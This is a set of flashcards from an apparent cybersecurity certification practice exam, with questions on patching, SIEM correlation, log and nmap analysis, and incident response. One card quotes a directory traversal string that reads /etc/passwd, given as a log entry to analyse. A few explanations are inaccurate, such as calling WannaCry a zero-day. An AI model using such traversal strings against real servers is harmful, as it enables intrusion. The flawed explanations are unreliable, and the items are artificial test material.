JasonDion Practice Exam 2 Flashcards

1
Q

In a network vulnerability assessment report, several zero-day and critical vulnerabilities were discovered. Why might this necessitate immediate action?

A. Because they indicate a need to hire more staff.
B. Because they signal a need to decrease the frequency of vulnerability assessments.
C. Because zero-day and critical vulnerabilities improve the system’s performance.
D. These vulnerabilities present significant risk due to no current security fix being available.

A

D. These vulnerabilities present significant risk due to no current security fix being available.

Zero-day and critical vulnerabilities are high-risk issues that can severely compromise a system’s security. One example of a zero-day virus that caused significant havoc is the “WannaCry” ransomware. It exploited a vulnerability in the Windows operating system, spreading rapidly across networks and encrypting files, demanding ransom payments in exchange for decryption. These types of vulnerabilities are significant threats, not performance enhancers. While additional resources might be needed for vulnerability management, the presence of critical vulnerabilities doesn’t directly indicate staffing needs. On the contrary, critical vulnerabilities might suggest a need for more frequent and thorough assessments.

2
Q

You need to determine the best way to test operating system patches in a lab environment before deploying them to your automated patch management system. Unfortunately, your network has several different operating systems in use, but you only have one machine available to test the patches on. What is the best environment to utilize to perform the testing of the patches before deployment?

A. Choose a few existing workstations to test the patches.
B. Sandboxing.
C. Bypass testing and deploy patches directly into the production environment.
D. Virtualization.

A

D. Virtualization.

When you have a limited amount of hardware resources to utilize but have a requirement to test multiple operating systems, you should set up a virtualized environment to test the patch across each operating system before deployment. You should never deploy patches directly into production without testing them first in the lab even on just a few workstations.

3
Q

Your organization is a financial services company. You have a team of security analysts who are responsible for gathering and analyzing intelligence about potential threats to your organization. The analysts recently published a report that identifies a new threat actor who is targeting financial services companies. The report includes information about the threat actor’s tactics, techniques, and procedures (TTPs). In which phase of the security intelligence cycle will this information be provided to those who need to act on it?

A. Dissemination
B. Analysis
C. Feedback
D. Collection

A

A. Dissemination

The dissemination phase refers to publishing information produced by analysis to consumers who need to develop the insights. The collection phase is usually implemented by administrators using various software suites, such as security information and event management (SIEM). This software must be configured with connectors or agents that can retrieve data from sources such as firewalls, routers, IDS sensors, and servers. The analysis phase focuses on converting collected data into useful information or actionable intelligence. The final phase of the security intelligence cycle is feedback and review, which utilizes both intelligence producers and intelligence consumers’ input. This phase aims to improve the implementation of the requirements, collection, analysis, and dissemination phases as the life cycle is developed.

4
Q

Dion Training has just suffered a website defacement of its public-facing webserver. The CEO believes the company’s biggest competitor may have done this act of vandalism. The decision has been made to contact law enforcement so that evidence can be collected properly for use in a potential court case. Laura is a digital forensics investigator assigned to collect the evidence. She creates a bit-by-bit disk image of the web server’s hard drive as part of her evidence collection. What technology should Laura use after creating the disk image to verify the copy’s data integrity matches that of the original web server’s hard disk?

A. AES
B. 3DES
C. SHA-256
D. RSA

A

C. SHA-256

SHA-256 is the Secure Hash Algorithm with a 256-bit length output. This is one of the most common hash algorithms in use and is employed in many applications and protocols. SHA-256 and other hashing algorithms are used to ensure the data integrity of a file has not been altered. RSA, 3DES, and AES are all encryption algorithms. These algorithms can ensure confidentiality but not integrity.

5
Q

An attacker recently compromised an e-commerce website for a clothing store. Which of the following methods did the attacker use to harvest an account’s cached credentials when the user logged into an SSO system?

A. Golden ticket
B. Lateral movement
C. Pass the hash
D. Pivoting

A

C. Pass the hash

Pass the Hash (PtH) is the process of harvesting an account’s cached credentials when the user logs in to a single sign-on (SSO) system. This would then allow the attacker to use the credentials on other systems, as well. A golden ticket is a Kerberos ticket that can grant other tickets in an Active Directory environment. Attackers who can create a golden ticket can use it to grant administrative access to other domain members, even to domain controllers. Lateral movement is an umbrella term for a variety of attack types. Attackers can extend their lateral movement by a great deal if they can compromise host credentials. Pivoting is a process similar to lateral movement. When attackers pivot, they compromise one central host (the pivot) that allows them to spread out to other hosts that would otherwise be inaccessible.

6
Q

You are working as a junior cybersecurity analyst and utilize a SIEM to support investigations into ongoing incidents. The SIEM is configured to collect data from numerous sources across the network, including network sensors, routers, switches, firewalls, hosts, and servers. Unfortunately, due to the number of data sources, you have data about a particular event being detected by different sensors and devices. Which of the following must you ensure to make sense of all the data being collected by your SIEM before analyzing it?

A. Data correlation
B. Data retention
C. Data recovery
D. Data sanitization

A

A. Data correlation

Data correlation is the first step in making sense of data from across numerous sensors. It ensures each piece of data is placed in context with the other pieces of data within the system. For example, if your IDS detected an incident, host logs were collected, and your packet capture system collected the network traffic, the SIEM could be used to correlate all three pieces of information from these different systems to allow an analyst to understand the event better. Data correlation allows an analyst to identify a pattern more clearly and take action. Data correlation should be performed as soon as the SIEM indexes the data.

7
Q

Your organization has implemented several cybersecurity tools, but there is a lack of coordination among the team in managing and facilitating automation. Which of the following actions would most effectively address this issue?

A. Buying more tools.
B. Limiting team access to tools.
C. Ongoing automation.
D. Establishing clear roles and responsibilities for managing automation.

A

D. Establishing clear roles and responsibilities for managing automation.

Establishing clear roles and responsibilities ensures everyone knows who is in charge of what parts of the automation process, reducing confusion and increasing coordination. Ignoring automation would be counterproductive. Automation can help improve efficiency and free up staff to focus on more complex tasks. Limiting team access to tools can lead to silos, inhibit teamwork, and reduce overall efficiency in managing and facilitating automation. Simply buying more tools doesn’t necessarily improve coordination among the team. It may add complexity and could actually worsen the issue without proper management and integration.

8
Q

You are reviewing the latest list of important web application security controls published by OWASP. Which of these items is LEAST likely to appear on that list?

A. Leverage security frameworks and libraries.
B. Implement identity and authentication controls.
C. Obscure web interface locations.
D. Implement appropriate access controls.

A

C. Obscure web interface locations.

The least likely option to appear in the list is to obscure web interface locations. This recommendation is based on security through obscurity and is not considered a good security practice. The other options are all considered best practices in designing web application security controls and creating software assurance in our programs.

9
Q

When applying patches as part of vulnerability management, why is it crucial to communicate the patching schedule and potential impacts to relevant stakeholders?

A. To help management make effective risk-based decisions on system disruptions due to patching.
B. To increase the company’s profitability.
C. To improve the company’s marketing strategies.
D. To enable stakeholders to plan company-wide meetings.

A

A. To help management make effective risk-based decisions on system disruptions due to patching.

This communication allows stakeholders to understand potential impacts on system availability and to plan activities accordingly, reducing disruptions. Patching schedules have little to do with marketing strategies; the main goal is to manage system availability and reduce disruptions. While secure operations can contribute to profitability, communicating about patching specifically aims to manage system downtime and business impact. While communication is essential in any organization, the purpose of discussing patching schedules specifically is to manage potential system downtime.

10
Q

Nicole’s organization does not have the budget or staff to conduct 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. Which of the following services or providers would be best suited for this role?

A. MSSP
B. IaaS
C. PaaS
D. SaaS

A

A. MSSP

A managed security service provider (MSSP) provides security as a service (SECaaS). IaaS, PaaS, and SaaS (infrastructure, platform, and software as a service) do not include security monitoring as part of their core service offerings. Security as a service or a managed service provider (MSP) would be better suited for this role. This question may seem beyond the exam scope. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!

11
Q

During the massive SolarWinds supply chain attack of 2020, cybersecurity professionals worldwide had to react quickly to protect their networks. A specific annual cybersecurity conference often hosts a capture-the-flag (CTF) event where participants are challenged to solve a series of real-world scenarios for practicing their incident response skills. Which conference is this?

A. Pwn2Own
B. RSA Conference
C. Black Hat
D. DEF CON

A

D. DEF CON

DEF CON is one of the world’s largest and most notable hacker conventions, held annually in Las Vegas, Nevada. Its capture-the-flag (CTF) event is a competitive and practical exercise in incident response. Pwn2Own is a computer hacking contest held annually at the CanSecWest security conference. However, its main focus is on discovering new vulnerabilities, not on incident response exercises. While the Black Hat conference is another renowned cybersecurity event, its primary focus is on revealing new vulnerabilities, not on practical incident response exercises like CTF. RSA Conference is a series of IT security conferences, but it does not host the capture-the-flag events for practical incident response exercises.

12
Q

You are conducting a quick nmap scan of a target network. You want to conduct a SYN scan, but you don’t have raw socket privileges on your workstation. Which of the following commands should you use to conduct the SYN scan from your workstation?

A. nmap -sS
B. nmap -sT
C. nmap -sX
D. nmap -O

A

B. nmap -sT

The nmap TCP connect scan (-sT) is used when the SYN scan (-sS) is not an option. You should use the -sT flag when you do not have raw packet privileges on your workstation or if you are scanning an IPv6 network. This flag tells nmap to establish a connection with the target machine by issuing the connect system call instead of directly using a SYN scan. Normally, a fast scan using the -sS (SYN scan) flag is more often conducted, but it requires raw socket access on the scanning workstation. The -sX flag would conduct an Xmas scan, where the FIN, PSH, and URG flags are set in the scan packets. The -O flag would conduct an operating system detection scan of the target system.

13
Q

You identified a critical vulnerability in one of your organization’s databases. You researched a solution, but it will require the server to be taken offline during the patch installation. You have received permission from the Change Advisory Board to implement this emergency change at 11 pm once everyone has left the office. It is now 3 pm; what action(s) should you take now to best prepare for implementing this evening’s change? (SELECT ALL THAT APPLY)

A. Validate the installation of the patch in a staging environment.
B. Ensure all stakeholders are informed of the planned outage.
C. Identify any potential risks associated with installing the patch.
D. Take the opportunity to install a new feature pack that has been requested.
E. Document the change in the change management system.
F. Take the server offline at 10 pm in preparation for the change.

A

A. Validate the installation of the patch in a staging environment.
B. Ensure all stakeholders are informed of the planned outage.
C. Identify any potential risks associated with installing the patch.
E. Document the change in the change management system.

You should send out a notification to the key stakeholders to ensure they are notified of the planned outage this evening. You should test and validate the patch in a staging environment before installing it on the production server. You should identify any potential risks associated with installing this patch. You should also document the change in the change management system. You should not take the server offline before your change window begins at 11 pm, which could affect users who are relying on the system. You should not take this opportunity to install any additional software, features, or patches unless you have received approval from the Change Advisory Board (CAB).

14
Q

Dion Training wants to install a new accounting system and is considering moving to a cloud-based solution to reduce cost, reduce the information technology overhead costs, improve reliability, and improve availability. Your Chief Information Officer is supportive of this move since it will be more fiscally responsible. Still, the Chief Risk Officer is concerned with housing all of the company’s confidential financial data in a cloud provider’s network that might be shared with other companies. Since the Chief Information Officer is determined to move to the cloud, what type of cloud-based solution would you recommend to account for the Chief Risk Officer’s concerns?

A. PaaS in a hybrid cloud.
B. SaaS in a public cloud.
C. PaaS in a community cloud.
D. SaaS in a private cloud.

A

D. SaaS in a private cloud.

A SaaS (Software as a Service) solution best describes an accounting system or software used as part of a cloud service. This meets the CIO’s requirements. To mitigate the concerns of the Chief Risk Officer, you should use a private cloud solution. This type of solution ensures that the cloud provider does not commingle your data with other customers’ data and provides dedicated servers and resources for your company’s use only.

15
Q

During a collaboration between a startup and a multinational corporation, the signed Memorandum of Understanding (MOU) has placed some limitations on the startup’s system access. What could this potentially lead to?

A. Potentially restricting ability to fully remediate vulnerabilities.
B. Greater market visibility for the startup.
C. An increase in the cybersecurity measures employed by the multinational corporation.
D. A reduction in overall project costs.

A

A. Potentially restricting ability to fully remediate vulnerabilities.

This situation could potentially lead to the startup having a restricted ability to fully remediate vulnerabilities within their systems. Due to the limitations placed by the MOU, the startup might not have the necessary access to apply patches, make configuration changes, or implement compensating controls as swiftly or comprehensively as needed. This could increase the time it takes to remediate vulnerabilities and potentially increase their exposure to risk. While the MOU outlines the agreement between the two parties, it does not inherently lead to cost reductions. While collaborating with a large corporation may increase visibility, this is unrelated to vulnerability management. The MOU does not directly affect the cybersecurity measures of the multinational corporation.

16
Q

Ted, a file server administrator, has noticed that a large number of sensitive files have been transferred from a corporate workstation to an IP address outside of the local area network. Ted looks up the IP address and determines that it is located in a foreign country. Ted contacts his company’s security analyst, who verifies that the workstation’s anti-malware solution is up-to-date, and the network’s firewall is properly configured. What type of attack most likely occurred to allow the exfiltration of the files from the workstation?

A. Session hijacking
B. Impersonation
C. Zero-day
D. MAC spoofing

A

C. Zero-day

Since the firewall is properly configured and the anti-malware solution is up-to-date, this signifies that a zero-day vulnerability may have been exploited. A zero-day vulnerability is an unknown vulnerability, so a patch or virus definition has not been released yet. A zero-day vulnerability refers to a hole in software that is unknown to the vendor. Hackers then exploit this security hole before the vendor becomes aware and hurries to fix it. This exploit is therefore called a zero-day attack. Zero-day attacks can include infiltrating malware or spyware, or allowing unwanted access to user information.

17
Q

Which of the following tools could be used to detect unexpected output from an application being managed or monitored?

A. A behavior-based analysis tool.
B. Manual analysis.
C. A log analysis tool.
D. A signature-based detection tool.

A

A. A behavior-based analysis tool.

A behavior-based analysis tool can capture/analyze normal behavior and then alert when an anomaly occurs. Configuring a behavior-based analysis tool requires more effort to set up properly, but it requires less work and manual monitoring once it is running. Signature-based detection is a process where a unique identifier is established about a known threat so that the threat can be identified in the future. Manual analysis requires a person to read all the output and determine if it is erroneous. A log analysis tool would only be useful to analyze the logs, but it would not detect unexpected output by itself. Instead, the log analysis tool would need to use a behavior-based or signature-based detection system.

18
Q

How does timely and effective communication and reporting of vulnerabilities assist an organization in meeting the GDPR’s requirement of reporting data breaches within 72 hours of detection?

A. It ensures that all employees will always adhere to data protection regulations.
B. It proves that the organization is immune to data breaches.
C. It guarantees all vulnerabilities will be fixed within 72 hours.
D. It facilitates quicker identification of vulnerabilities enabling prompt reporting to the supervisory authority.

A

D. It facilitates quicker identification of vulnerabilities enabling prompt reporting to the supervisory authority.

By identifying and addressing vulnerabilities promptly, the organization can more effectively manage incidents and meet the GDPR’s 72-hour reporting requirement. Organizations that fail to report data breaches to the supervisory authority or to individuals affected by the breach may be subject to fines of up to €20 million or 4% of global annual turnover, whichever is greater. No organization is completely immune to data breaches, as new threats and vulnerabilities continuously evolve. While training and policies can encourage compliance, human errors or misconduct can still occur. While this would be ideal, the complexity of certain vulnerabilities may require more time for a comprehensive fix.

19
Q

During your review of the firewall logs, you notice that an IP address from within your company’s server subnet had been transmitting between 125 to 375 megabytes of data to a foreign IP address overnight each day. You have determined this has been occurring for approximately 5 days, and the affected server has since been taken offline for forensic review. Which of the following is MOST likely to increase the impact assessment of the incident?

A. Forensic review of the server required fallback to a less efficient service.
B. IP addresses and other network-related configurations were exfiltrated.
C. PII of company employees and customers was exfiltrated.
D. Raw financial information about the company was accessed.

A

C. PII of company employees and customers was exfiltrated.

If the PII (Personally Identifiable Information) of the company’s employees or customers were exfiltrated or stolen during the compromise, this would increase the incident’s impact assessment. Loss of PII is a big issue for corporations and one that might garner media attention. While all of the options presented here are bad things that could increase the impact of the assessment, loss of PII is considered the MOST likely to increase the impact dramatically. Depending on the company’s size or organization, there may also be mandatory reporting requirements, fines, or restitution that must be paid.

20
Q

What technology is NOT PKI x.509 compliant and cannot be used in various secure functions?

A. Blowfish
B. AES
C. SSL/TLS
D. PKCS

A

A. Blowfish

AES, PKCS, and SSL/TLS are all compatible with x.509 and can be used in a wide variety of functions and purposes. AES is used for symmetric encryption. PKCS is used as a digital signature algorithm. SSL/TLS is used for secure key exchange.

21
Q

You are a cybersecurity analyst for a mid-sized company. One day, you decided to perform a routine scan of your internal network using the Angry IP Scanner tool. The output returned was as follows:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
IP           Ping     Hostname           Ports                      TTL
192.168.1.1  34 ms    router.domain.com  80, 443                    64
192.168.1.2  40 ms    pc1.domain.com     22, 80, 443                128
192.168.1.3  Timeout  pc2.domain.com     -                          -
192.168.1.4  45 ms    unknown.device     21, 23, 25, 80, 443, 3389  64
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this output, which of the following represents a potential indicator of compromise (IoC) that should be investigated further?

A. The open ports 80 and 443 on 192.168.1.1.
B. The timeout response from 192.168.1.3.
C. The unknown device 192.168.1.4 with multiple open ports, including 21, 23, 25, and 3389.
D. The open port 22 on 192.168.1.2.

A

C. The unknown device 192.168.1.4 with multiple open ports, including 21, 23, 25, and 3389.

The unknown device at 192.168.1.4 is a potential indicator of compromise (IoC) due to several reasons. First, the device is unknown, which suggests that it’s not a recognized system within the network, thus raising suspicions. Secondly, it has multiple ports open, including 21 (FTP), 23 (Telnet), 25 (SMTP), 80 (HTTP), 443 (HTTPS), and 3389 (RDP). These ports being open could indicate services that are vulnerable to exploitation or are already being exploited, especially when they are on an unrecognized device. The combination of an unknown device and open ports commonly used for management or data transfer warrants further investigation. The open ports 80 and 443 on 192.168.1.1 represent standard web services (HTTP and HTTPS). If 192.168.1.1 is a web server or a network device with a web-based management interface (which is common), these ports would likely be open as part of normal operation. The timeout response from 192.168.1.3 is not necessarily an indicator of compromise. It could merely be that the system was offline or unreachable at the time of the scan. The open port 22 on 192.168.1.2 is for SSH, a secure method of remote administration commonly used in many environments. Although it should be secured and monitored, its mere presence isn’t an immediate indicator of compromise.

22
Q

You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security scanning software recommends that you remediate this by changing user authentication to port 636 wherever possible. What should you do?

A. Conduct remediation actions to update encryption keys on each server to match port 636.
B. Change all devices and servers that support it to port 636 since port 389 is a reserved port that requires root access and can expose the server to privilege escalation attacks.
C. Mark this as a false positive in your audit report since the services that typically run on ports 389 and 636 are identical.
D. Change all devices and servers that support it to port 636 since encrypted services run by default on port 636.

A

D. Change all devices and servers that support it to port 636 since encrypted services run by default on port 636.

LDAP can be run on either port 389 or port 636. Port 389 is the standard port for LDAP but typically runs unencrypted LDAP services over this port. Instead, you should change all devices and servers that can technically support the change to port 636 since LDAP services over port 636 are encrypted by default.

23
Q

You are conducting a review of a VPN device’s logs and found the following URL being accessed:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
https://sslvpn/dana-na/../diontraining/html5acc/teach/../../../../../../etc/passwd?/diontraining/html5acc/teach/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based upon this log entry alone, which of the following most likely occurred?

A. The /etc/passwd file was downloaded using a directory traversal attack.
B. The /etc/passwd file was downloaded using a directory traversal attack if input validation of the URL was not conducted.
C. An SQL injection attack caused the VPN server to return the password file.
D. A XML injection attack caused the VPN server to return the password file.

A

B. The /etc/passwd file was downloaded using a directory traversal attack if input validation of the URL was not conducted.

The exact string used here was the attack string used in CVE-2019-11510 to compromise thousands of VPN servers worldwide using a directory traversal approach. However, its presence in the logs does not prove that the attack was successful, only that it was attempted. To verify that the attacker successfully downloaded the /etc/passwd file, a cybersecurity analyst would require additional information and correlation. If the server utilizes proper input validation on URL entries, then the directory traversal would be prevented. As no SQL or XML language elements are present, this is definitely not an SQL or XML injection attack.

24
Q

You just completed an nmap scan against a workstation and received the following output:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# nmap diontraining012

Starting Nmap ( http://nmap.org )
Nmap scan report for diontraining012 (192.168.14.61)
Not shown: 997 filtered ports
PORT STATE
135/tcp open
139/tcp open
445/tcp open
Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on these results, which of the following operating system is most likely being run by this workstation?

A. CentOS
B. Ubuntu
C. macOS
D. Windows

A

D. Windows

25
Q

Evaluate the following log entry:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this log entry, which of the following statements are true?

A. An attempted connection to the telnet service was prevented.
B. An attempted connection to the ssh service was prevented.
C. The packet was blocked outbound from the network.
D. Packets are being blocked inbound to and outbound from the network.
E. MAC filtering is enabled on the firewall.
F. The packet was blocked inbound to the network.

A

A. An attempted connection to the telnet service was prevented.
F. The packet was blocked inbound to the network.

Firewall log formats will vary by vendor, but this example is a commonly used format from the Linux iptables firewall tool. This log starts with the date and time of the event and provides some key pieces of information. For example, the word “drop” shows the action this log entry recorded. In this case, the firewall dropped a packet due to an ACL rule being applied. You can also see that the packet was detected on the inbound connection over eth0 (IN=eth0), so we know that packets are being scanned and blocked when they are headed inbound to the network. Next, we see the MAC address of the source device of the packet, the source (SRC) IP address, and the destination (DST) IP address. Further down, we see the source (SPT) and destination (DPT) ports. In this case, the DPT is 23, which is the well-known port for telnet. Based on this single log entry, we cannot tell whether packets are also being blocked when they attempt to leave the network, or whether connections to the ssh service (port 22) are also being blocked.

26
Q

You’re an incident response team member at a prominent financial institution. A recent intrusion, such as the infamous Equifax breach, has potentially exposed customer financial data. As part of your incident response duties, you need to liaise with the legal department to address potential liabilities and discuss the way forward. What primarily makes this interaction imperative?

A. To request additional funding for cybersecurity tools.
B. To educate them about cybersecurity.
C. To ensure compliance with data breach laws.
D. To inform them of the technical details of the breach.

A

C. To ensure compliance with data breach laws.

Data breach laws and regulations require institutions to take certain actions in the event of a data breach, which could include notifying affected customers and regulatory bodies within a specific time frame. Though educating everyone about cybersecurity is beneficial, it’s not the primary reason for communicating with the legal department in this situation. The main aim is to ensure the company’s response aligns with legal requirements. Although securing funding for improved cybersecurity could be a long-term goal, it’s not the primary reason to communicate with the legal department after a breach. Legal should be involved to ensure regulatory compliance and address potential liabilities. While it’s important to share some details with the legal team, they typically do not need to know the intricate technical aspects of the breach. The focus should be more on legal implications and steps to manage potential liabilities.

27
Q

Which of the following policies should contain the requirements for removing a user’s access when an employee is terminated?

A. Data ownership policy.
B. Account management policy.
C. Data retention policy.
D. Data classification policy.

A

B. Account management policy.

28
Q

You are reverse engineering a piece of malware recovered from a retailer’s network for analysis. They found that the malicious code was extracting track data from their customers’ credit cards during processing. Which of the following types of threats would you classify this malware as?

A. Rootkit
B. Ransomware
C. Keylogger
D. POS malware

A

D. POS malware

29
Q

Which analysis framework provides a graphical depiction of the attacker’s approach relative to a kill chain?

A. Diamond Model of Intrusion Analysis
B. Lockheed Martin cyber kill chain
C. OpenIOC
D. MITRE ATT&CK framework

A

A. Diamond Model of Intrusion Analysis

The Diamond Model provides an excellent methodology for communicating cyber events and allowing analysts to derive mitigation strategies implicitly. The Diamond Model is constructed around a graphical representation of an attacker’s behavior. The MITRE ATT&CK framework provides explicit pseudo-code examples for detecting or mitigating a given threat within a network and ties specific behaviors back to individual actors. The Lockheed Martin cyber kill chain provides a general life cycle description of how attacks occur but does not deal with the specifics of how to mitigate. OpenIOC contains a depth of research on APTs but does not integrate the detections and mitigation strategy.

30
Q

Your organization’s primary operating system vendor just released a critical patch for your servers. Your system administrators have recently deployed this patch and verified the installation was successful. This critical patch was designed to remediate a vulnerability that can allow a malicious actor to remotely execute code on the server over the Internet. You ran a vulnerability scan of the network and determined that all servers are still being reported as having the vulnerability. You verified all your scan configurations are correct. Which of the following might be the reason that the scan report is still showing the servers as vulnerable? (SELECT ALL THAT APPLY)

A. The wrong IP address range was scanned during your vulnerability assessment.
B. The vulnerability assessment scan is returning a false positive.
C. You conducted the vulnerability scan without waiting long enough after the patch was installed.
D. This critical patch did not remediate the vulnerability.

A

B. The vulnerability assessment scan is returning a false positive.
D. This critical patch did not remediate the vulnerability.

There are two reasonable choices presented: (1) the vulnerability assessment scan is returning a false positive, or (2) this critical patch did not remediate the vulnerability. It is impossible to know which it is based on the description in the question. If the patch was installed successfully, as the question states, then it is possible that the critical patch was coded incorrectly and did not actually remediate the vulnerability. While most operating system vendors test their patches before release to prevent this, extremely critical patches are sometimes rushed into production, and the patch then fails to remediate the vulnerability on all systems. When this occurs, the vendor will issue a subsequent patch to fix it and supersede the original patch. The other option is that the vulnerability assessment tool is incorrectly configured and is returning a false positive. This can occur when the signature used to detect the vulnerability is too specific or too generic to actually detect whether the system was patched for the vulnerability or not. The other options are incorrect, as you do not have to wait a certain period of time after installation before scanning, and it is assumed that you are scanning the same IP range both times because you have verified your scan configuration.

31
Q

A vulnerability scanner has reported that a vulnerability exists in the system. Upon validating the report, the analyst determines that this reported vulnerability does not exist on the system. What is the proper term for this situation?

A. False positive
B. True negative
C. True positive
D. False negative

A

A. False positive

A false positive occurs when a scanner detects a vulnerability, but the vulnerability does not actually exist on the scanned system. A true positive occurs when a scanner detects a vulnerability, and the vulnerability exists on the scanned system. A true negative occurs when a scanner does not detect a vulnerability because the vulnerability does not exist on the scanned system. A false negative occurs when a scanner does not detect a vulnerability, but the vulnerability actually exists on the scanned system.

32
Q

What is the primary importance of the ‘Mean Time to Detect’ (MTTD) metric in the context of incident response?

A. It gauges the impact of an incident on the organization.
B. It determines the severity of an incident.
C. It measures the effectiveness of detection mechanisms.
D. It calculates the total duration of the incident response process.

A

C. It measures the effectiveness of detection mechanisms.

The MTTD metric evaluates the efficiency of an organization’s detection systems by measuring the time it takes to identify a potential incident. The MTTD metric does not directly measure the impact of an incident. It focuses on the detection capabilities of the organization. MTTD measures the time taken to detect an incident, not the severity of the incident. While MTTD contributes to the overall timeline of incident response, it specifically refers to the time from when an incident occurs to when it is detected, not the total duration of the response process.

33
Q

Which analysis framework provides the most explicit detail regarding how to mitigate or detect a given threat?

A. Diamond Model of Intrusion Analysis
B. OpenIOC
C. MITRE ATT&CK framework
D. Lockheed Martin cyber kill chain

A

C. MITRE ATT&CK framework

The MITRE ATT&CK framework provides explicit pseudo-code examples for detecting or mitigating a given threat within a network and ties specific behaviors back to individual actors. The Diamond Model provides an excellent methodology for communicating cyber events and allowing an analyst to derive mitigation strategies implicitly. The Lockheed Martin cyber kill chain provides a general life cycle description of how attacks occur but does not deal with the specifics of how to mitigate. OpenIOC contains a depth of research on APTs but does not integrate the detections and mitigation strategy.

34
Q

What is a reverse proxy commonly used for?

A. To obfuscate the origin of a user within a network.
B. Allowing access to a virtual private cloud.
C. Directing traffic to internal services if the contents of the traffic comply with the policy.
D. To prevent the unauthorized use of cloud services from the local network.

A

C. Directing traffic to internal services if the contents of the traffic comply with the policy.

A reverse proxy is positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with the policy. This does not require the configuration of the users’ devices. This approach is only possible if the cloud application has proxy support. You can deploy a reverse proxy and configure it to listen for client requests from a public network, like the internet. The proxy then creates the appropriate request to the internal server on the corporate network and passes the server’s response back to the external client. They are not generally intended to obfuscate the source of communication, nor are they necessarily specific to the cloud. A cloud access security broker (CASB) can be used to prevent unauthorized use of cloud services from the local network.

35
Q

Jorge is working with an application team to remediate a critical SQL injection vulnerability on a public-facing server. The team is worried that deploying the fix will require several hours of downtime and block customer transactions from being completed by the server. Which of the following is the BEST action for Jorge to recommend?

A. Remediate the vulnerability immediately.
B. Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability.
C. Wait until next scheduled maintenance window to remediate the vulnerability.
D. Delay the remediation until the next major update of the SQL server occurs.

A

B. Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability.

Jorge should recommend that an emergency maintenance window be scheduled for an off-peak time later in the day. Since the vulnerability is critical, it needs to be remediated or mitigated as quickly as possible. However, this also needs to be balanced against the business and operational needs. Therefore, we cannot simply remediate it immediately, as this would cause downtime for this public-facing server. It is also unreasonable to accept the risk until the next scheduled maintenance window since it is a critical vulnerability. Therefore, the best way to balance the risk of the vulnerability against the risk of the outage is to schedule an emergency maintenance window and patch the server during that time.

36
Q

Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization’s database?

A. Denial of service
B. SQL injection
C. Cross-site scripting
D. Buffer overflow

A

B. SQL injection

A SQL injection poses the most direct and most impactful threat to an organization’s database. A SQL injection could allow the attacker to execute remote commands on the database server and lead to sensitive information disclosure. A buffer overflow attack attempts to overwrite the memory buffer to send additional data into adjacent memory locations. A buffer overflow attack might target a database server, but it isn’t intended to disclose information directly. Instead, a buffer overflow attack may be used to gain initial access to a server and allow other malicious code to run. A denial of service targets the availability of the information by attempting to take the server offline. A cross-site scripting attack is typically focused on the user, not the server or database.

37
Q

While reviewing the configuration settings of your company’s IIS web servers, you notice that directory browsing is enabled. This misconfiguration could potentially expose which of the following to an attacker?

A. Your company’s financial records.
B. Your company’s user email addresses.
C. The private keys of your SSL certificates.
D. The structure and content of your web directories.

A

D. The structure and content of your web directories.

If directory browsing is enabled on a web server, it can expose the structure and content of your web directories to an attacker, potentially revealing sensitive information or giving the attacker information that could be used to exploit the server. Enabling directory browsing does not expose the private keys of your SSL certificates, as these should be stored securely and not accessible through directory browsing. Unless your company’s financial records are improperly stored in the web directories, enabling directory browsing on a web server should not expose them. Directory browsing on a web server typically wouldn’t expose user email addresses unless they were stored unsecured in the web directories, which is a separate issue.

38
Q

What control provides the best protection against both SQL injection and cross-site scripting attacks?

A. Network layer firewalls
B. Input validation
C. Hypervisors
D. CSRF

A

B. Input validation

Input validation prevents the attacker from sending invalid data to an application and is a strong control against both SQL injection and cross-site scripting attacks. A network layer firewall is a device that is designed to prevent unauthorized access, thereby protecting the computer network. It blocks unauthorized communications into the network and only permits authorized access based on the IP address, ports, and protocols in use. Cross-site request forgery (CSRF) is another attack type. A hypervisor controls access between virtual machines.

39
Q

Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect if an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring?

A. Anomaly
B. Behavior
C. Trend
D. Heuristic

A

B. Behavior

This is an example of behavior-based detection. Behavior-based detection (or statistical- or profile-based detection) means that the engine is trained to recognize baseline traffic or expected events associated with a user account or network device. Anything that deviates from this baseline (outside a defined level of tolerance) generates an alert. Heuristic analysis determines whether several observed data points constitute an indicator and whether related indicators make up an incident; this depends on a good understanding of the relationship between the observed indicators. Human analysts are typically good at interpreting context but work painfully slowly, in computer terms, and cannot hope to cope with the sheer volume of data and traffic generated by a typical network. Anomaly analysis is the process of defining an expected outcome or pattern to events and then identifying any events that do not follow these patterns. This is useful in tools and environments that enable you to set rules. Trend analysis is not used for detection but instead to better understand capacity and the system’s normal baseline. Behavior-based detection differs from anomaly-based detection. Behavior-based detection records expected patterns concerning the entity being monitored (in this case, user logins). Anomaly-based detection prescribes the baseline for expected patterns based on its own observation of what normal looks like.

40
